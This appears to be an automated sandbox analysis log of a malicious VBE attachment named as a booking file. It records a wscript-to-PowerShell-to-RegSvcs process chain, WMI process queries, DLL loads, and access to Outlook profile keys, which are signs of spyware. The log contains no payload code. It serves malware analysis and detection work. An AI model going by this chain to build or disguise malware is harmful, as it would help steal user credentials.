                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBE@10/12@2/3
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShellJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-399786117
                  Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lqfx2iv5.p3l.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs"
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='RegSvcs.exe'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Booking_0731520.vbeReversingLabs: Detection: 25%
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Booking_0731520.vbe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\PPJeBFdmEDGXlnL.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "8092" "2736" "2688" "2740" "0" "0" "2744" "0" "0" "0" "0" "0"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "8092" "2736" "2688" "2740" "0" "0" "2744" "0" "0" "0" "0" "0" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B2E480 push ecx; retn 0006h8_2_06B2E48A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B2A4F5 push ecx; retn 0006h8_2_06B2A512
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B24D50 push es; ret 8_2_06B24D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B2DAC7 push ebp; iretd 8_2_06B2DAC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B2FBCD push es; iretd 8_2_06B2FBDC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B2DB3F push ebp; iretd 8_2_06B2DB40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06B2FB10 push es; iretd 8_2_06B2FB20
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
